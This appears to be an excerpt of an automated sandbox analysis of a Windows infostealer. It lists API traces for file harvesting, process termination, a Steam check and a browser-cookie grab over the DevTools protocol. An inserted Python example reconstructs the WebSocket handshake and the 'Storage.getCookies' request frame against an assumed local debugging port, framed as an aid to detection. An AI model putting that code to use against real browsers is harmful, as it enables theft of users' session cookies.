                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013140F
                            • lstrlen.KERNEL32(00154CAC), ref: 0013141A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131437
                            • lstrcat.KERNEL32(00000000,00154CAC), ref: 00131443
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013146E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0013148A
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 001314AC
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 001314C6
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001314FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131527
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131532
                            • lstrlen.KERNEL32(0015179C), ref: 0013153D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013155A
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131566
                            • lstrlen.KERNEL32(?), ref: 00131573
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131593
                            • lstrcat.KERNEL32(00000000,?), ref: 001315A1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001315CA
                            • StrCmpCA.SHLWAPI(?,013FD388), ref: 001315F3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131634
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013165D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131685
                            • StrCmpCA.SHLWAPI(?,013FD758), ref: 001316A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 001316E3
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013170C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131734
                            • lstrcpy.KERNEL32(00000000,?), ref: 001318E6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013190E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131945
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013196C
                            • FindClose.KERNEL32(00000000), ref: 0013197B
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: a4c056d8155a3b2e19cd2c060fb95f3d9009cd2fce706c24ae1d9b558623dbe7
                            • Instruction ID: 6cbae7c60bd86e5b870ced04236426b186ff5ead2f9afa7c7b5857145821162b
                            • Opcode Fuzzy Hash: a4c056d8155a3b2e19cd2c060fb95f3d9009cd2fce706c24ae1d9b558623dbe7
                            • Instruction Fuzzy Hash: 09C1F531A10726EBCB22EF74EC89BAE77B8AF54305F040528F846A3660DB30DD45CB90
                            APIs
                            • wsprintfA.USER32 ref: 0013E40C
                            • FindFirstFileA.KERNEL32(?,?), ref: 0013E423
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 0013E443
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 0013E45D
                            • wsprintfA.USER32 ref: 0013E482
                            • StrCmpCA.SHLWAPI(?,0014CFF4), ref: 0013E494
                            • wsprintfA.USER32 ref: 0013E4B1
                              • Part of subcall function 0013EFC0: lstrcpy.KERNEL32(00000000,?), ref: 0013EFF2
                            • wsprintfA.USER32 ref: 0013E4D0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0013E4E4
                            • lstrcat.KERNEL32(?,013FE878), ref: 0013E515
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013E527
                            • lstrcat.KERNEL32(?,?), ref: 0013E538
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013E54A
                            • lstrcat.KERNEL32(?,?), ref: 0013E55E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0013E574
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E5B2
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E602
                            • DeleteFileA.KERNEL32(?), ref: 0013E63C
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013E67B
                            • FindClose.KERNEL32(00000000), ref: 0013E68A
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: b67286ff980924f388f2f1eb3c3a447c92504f19e22b0f0f6e524b3ba0d86409
                            • Instruction ID: fe623d5b636325bb695abfd53934ebd2cd62ee47744fb47436e4856fcbb69757
                            • Opcode Fuzzy Hash: b67286ff980924f388f2f1eb3c3a447c92504f19e22b0f0f6e524b3ba0d86409
                            • Instruction Fuzzy Hash: 23817371900329EBCB21EF64EC45AEE77BDBF58301F004999F51A97190EB34AA58CF90
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001216E2
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012176C
                            • lstrcat.KERNEL32(00000000), ref: 00121776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001217A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 001218F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001218FE
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: 75cde123edd45d5ca1147a6b552b9c708576b1df37f272513781eb7bf9d6c313
                            • Instruction ID: 85f9e2f839f849243c949b03301ab2f8fc98d9df9e79eaf90bfc84f756d0ef72
                            • Opcode Fuzzy Hash: 75cde123edd45d5ca1147a6b552b9c708576b1df37f272513781eb7bf9d6c313
                            • Instruction Fuzzy Hash: 2A81A13191123AFBCF22EF68F885AAE77B8AF65305F041125F805A7665CB309D61CB90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0013DF35
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0013DF3C
                            • wsprintfA.USER32 ref: 0013DF52
                            • FindFirstFileA.KERNEL32(?,?), ref: 0013DF69
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 0013DF8C
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 0013DFA6
                            • wsprintfA.USER32 ref: 0013DFC4
                            • DeleteFileA.KERNEL32(?), ref: 0013E010
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0013DFDD
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                              • Part of subcall function 0013DB70: memset.MSVCRT ref: 0013DB91
                              • Part of subcall function 0013DB70: memset.MSVCRT ref: 0013DBA3
                              • Part of subcall function 0013DB70: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013DBCB
                              • Part of subcall function 0013DB70: lstrcpy.KERNEL32(00000000,?), ref: 0013DBFE
                              • Part of subcall function 0013DB70: lstrcat.KERNEL32(?,00000000), ref: 0013DC0C
                              • Part of subcall function 0013DB70: lstrcat.KERNEL32(?,013FE400), ref: 0013DC26
                              • Part of subcall function 0013DB70: lstrcat.KERNEL32(?,?), ref: 0013DC3A
                              • Part of subcall function 0013DB70: lstrcat.KERNEL32(?,013FD328), ref: 0013DC4E
                              • Part of subcall function 0013DB70: lstrcpy.KERNEL32(00000000,?), ref: 0013DC7E
                              • Part of subcall function 0013DB70: GetFileAttributesA.KERNEL32(00000000), ref: 0013DC85
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013E01E
                            • FindClose.KERNEL32(00000000), ref: 0013E02D
                            • lstrcat.KERNEL32(?,013FE878), ref: 0013E056
                            • lstrcat.KERNEL32(?,013FDA38), ref: 0013E06A
                            • lstrlen.KERNEL32(?), ref: 0013E074
                            • lstrlen.KERNEL32(?), ref: 0013E082
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E0C2
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: 8ed5e7bb81e6ecf6144d96ef97b3cfde877abdc570c0d4d99f7d1e6f8eff089d
                            • Instruction ID: 1dcfe8a45cfc09c9a09fea57378ef4817d378c2c5c61c40cfc90b04cf637d9a4
                            • Opcode Fuzzy Hash: 8ed5e7bb81e6ecf6144d96ef97b3cfde877abdc570c0d4d99f7d1e6f8eff089d
                            • Instruction Fuzzy Hash: B5617271910318EBCB21EF74EC89AEE77B9BF58301F0045A5F906A7291DB34AA54CF50
                            APIs
                            • wsprintfA.USER32 ref: 0013D73D
                            • FindFirstFileA.KERNEL32(?,?), ref: 0013D754
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 0013D774
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 0013D78E
                            • lstrcat.KERNEL32(?,013FE878), ref: 0013D7D3
                            • lstrcat.KERNEL32(?,013FE8C8), ref: 0013D7E7
                            • lstrcat.KERNEL32(?,?), ref: 0013D7FB
                            • lstrcat.KERNEL32(?,?), ref: 0013D80C
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013D81E
                            • lstrcat.KERNEL32(?,?), ref: 0013D832
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013D872
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013D8C2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013D927
                            • FindClose.KERNEL32(00000000), ref: 0013D936
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: baba38d0b56aa012a74e98602a0eb6cc0be8562483c0f3c810ba0d72adedef33
                            • Instruction ID: bbbcefb05c066c47ea91c06889fcb4ee6fc92d3e57ba4a83c83125b28268a57d
                            • Opcode Fuzzy Hash: baba38d0b56aa012a74e98602a0eb6cc0be8562483c0f3c810ba0d72adedef33
                            • Instruction Fuzzy Hash: F7619571910229EBCF21EF74EC85ADE77B8EF58311F0049A9E649A7250DB34EA54CF90
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: dbd5df41d1463d57b9c158467f1129fad9c88474575c3abf27f1620d39003305
                            • Instruction ID: 5a1c2361e933a1ae23e4cbedec414b70704cf2879dde964945b3829fc340e735
                            • Opcode Fuzzy Hash: dbd5df41d1463d57b9c158467f1129fad9c88474575c3abf27f1620d39003305
                            • Instruction Fuzzy Hash: FCA23671D012699FDB20DFA8C8907EDBBB6BF58300F1481AAE519B7252DB705E85CF90
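The strings in the function above (`Connection: Upgrade`, `Upgrade: websocket`, `Sec-WebSocket-Key: `, `Sec-WebSocket-Version: 13`, ` HTTP/1.1`, `Host: `, `ws://` and `{"id":1,"method":"Storage.getCookies"}`) are the pieces of a hand-rolled WebSocket client that speaks the Chrome DevTools Protocol; `Storage.getCookies` is the CDP method that returns the browser's whole cookie jar, so the function reads as a cookie grab through a browser's remote-debugging port rather than through the on-disk database. The following is an added example, not code from the report or from the sample: it rebuilds that client side in Python (RFC 6455 handshake key and accept check, a masked text frame carrying the CDP request, and the inverse parser a proxy or the browser would apply), so the exchange can be reproduced or matched offline. The host, port and page path are assumptions for the demonstration; the report shows only the string fragments.

```python
"""Added example (not from the Joe Sandbox report or the sample): the client
side of the WebSocket + DevTools Protocol exchange whose string fragments
appear in the function above. Target host/port/path are assumptions."""
import base64
import hashlib
import os
import struct
from typing import Optional

WS_GUID = b"258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed by RFC 6455, section 4.2.2
CDP_GET_COOKIES = '{"id":1,"method":"Storage.getCookies"}'  # literal seen in the sample


def websocket_key(nonce: Optional[bytes] = None) -> str:
    """16 random bytes, base64-encoded, sent as Sec-WebSocket-Key."""
    return base64.b64encode(nonce or os.urandom(16)).decode()


def expected_accept(key: str) -> str:
    """Sec-WebSocket-Accept the server must return for this key: base64(SHA-1(key + GUID))."""
    return base64.b64encode(hashlib.sha1(key.encode() + WS_GUID).digest()).decode()


def upgrade_request(host: str, port: int, path: str, key: str) -> bytes:
    """HTTP/1.1 Upgrade request; header order follows the fragments in the sample."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}:{port}",
        "Connection: Upgrade",
        "Upgrade: websocket",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def handshake_ok(response: bytes, key: str) -> bool:
    """True only for a 101 response whose accept value was derived from our key."""
    head = response.split(b"\r\n\r\n", 1)[0].decode(errors="replace").split("\r\n")
    if not head or not head[0].startswith("HTTP/1.1 101"):
        return False
    accept = next((h.split(":", 1)[1].strip() for h in head[1:]
                   if h.lower().startswith("sec-websocket-accept:")), None)
    return accept == expected_accept(key)


def client_text_frame(payload: str, mask: Optional[bytes] = None) -> bytes:
    """One FIN text frame (0x81). Client-to-server frames must be masked (RFC 6455, 5.1);
    a browser closes the socket on an unmasked one, so the stealer has to do this too."""
    data, mask = payload.encode(), mask or os.urandom(4)
    n = len(data)
    if n < 126:
        header = bytes([0x81, 0x80 | n])
    elif n < 65536:
        header = bytes([0x81, 0x80 | 126]) + struct.pack(">H", n)
    else:
        header = bytes([0x81, 0x80 | 127]) + struct.pack(">Q", n)
    return header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(data))


def parse_client_frame(frame: bytes) -> str:
    """Inverse of client_text_frame: what the browser (or a monitoring proxy) decodes."""
    fin_opcode, mask_len = frame[0], frame[1]
    if fin_opcode != 0x81 or not mask_len & 0x80:
        raise ValueError("expected a masked FIN text frame")
    n, pos = mask_len & 0x7F, 2
    if n == 126:
        n, pos = struct.unpack(">H", frame[2:4])[0], 4
    elif n == 127:
        n, pos = struct.unpack(">Q", frame[2:10])[0], 10
    mask, body = frame[pos:pos + 4], frame[pos + 4:pos + 4 + n]
    return bytes(b ^ mask[i % 4] for i, b in enumerate(body)).decode()


if __name__ == "__main__":
    key = websocket_key()
    # Assumed target: a browser launched with a remote-debugging port (not stated in the report).
    print(upgrade_request("127.0.0.1", 9222, "/devtools/page/ABC123", key).decode())
    frame = client_text_frame(CDP_GET_COOKIES)
    print(frame.hex(), "->", parse_client_frame(frame))
```

On the wire this is the sequence to look for: a plaintext HTTP Upgrade to a loopback port followed by a short masked frame whose unmasked body is the `Storage.getCookies` request; the browser's reply is an unmasked frame carrying every cookie as JSON.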
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00132524
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132547
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00132552
                            • lstrlen.KERNEL32(\*.*), ref: 0013255D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013257A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00132586
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001325BA
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 001325D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 429d6076be62c0d8e0094ca2aaa5badbae82a4b6fb39eee66b273a6e3380029e
                            • Instruction ID: 47fa581c67502242fd3a1e85d3fe71b0011bde95ce9d6bba394aa16463f36dcc
                            • Opcode Fuzzy Hash: 429d6076be62c0d8e0094ca2aaa5badbae82a4b6fb39eee66b273a6e3380029e
                            • Instruction Fuzzy Hash: 95419231510635EBCB32FF28EC86BDE77B8AF25301F001225F80A97965DB309E158B90
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 001448C9
                            • Process32First.KERNEL32(00000000,00000128), ref: 001448D9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 001448EB
                            • StrCmpCA.SHLWAPI(?,?), ref: 001448FD
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00144912
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00144921
                            • CloseHandle.KERNEL32(00000000), ref: 00144928
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00144936
                            • CloseHandle.KERNEL32(00000000), ref: 00144941
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 277f85610f5eb72fddc17766c246c76bd8ee26145dca84740d83c747bf04bd1e
                            • Instruction ID: 4720f7b7cb8c150eacdc7868b767b0ab9c21910073e56752f7f5eb5e8bb73cf0
                            • Opcode Fuzzy Hash: 277f85610f5eb72fddc17766c246c76bd8ee26145dca84740d83c747bf04bd1e
                            • Instruction Fuzzy Hash: EC018031601315ABE7225B61EC8DFFB777CEB4CB16F000599F905E21A0EF7499849B61
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $Q5$1+S|$>Yn_$N3z$Vw{$[au?$`3v$aETR$|6
                            • API String ID: 0-729258315
                            • Opcode ID: 74b3f22e2487470f209bb23a0fbfffa2af70a1db0aa7e5e29baf44ab4e6c06d5
                            • Instruction ID: 2e98e5126a06377e73d39fb8c2b0c7f80d58452f8732ea5f1243a3f2501ef531
                            • Opcode Fuzzy Hash: 74b3f22e2487470f209bb23a0fbfffa2af70a1db0aa7e5e29baf44ab4e6c06d5
                            • Instruction Fuzzy Hash: 1DB215F360C2049FE304AF2DEC8567AFBE5EF94320F1A892DE6C583744EA3558458697
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00144838
                            • Process32First.KERNEL32(00000000,00000128), ref: 00144848
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0014485A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00144870
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00144882
                            • CloseHandle.KERNEL32(00000000), ref: 0014488D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
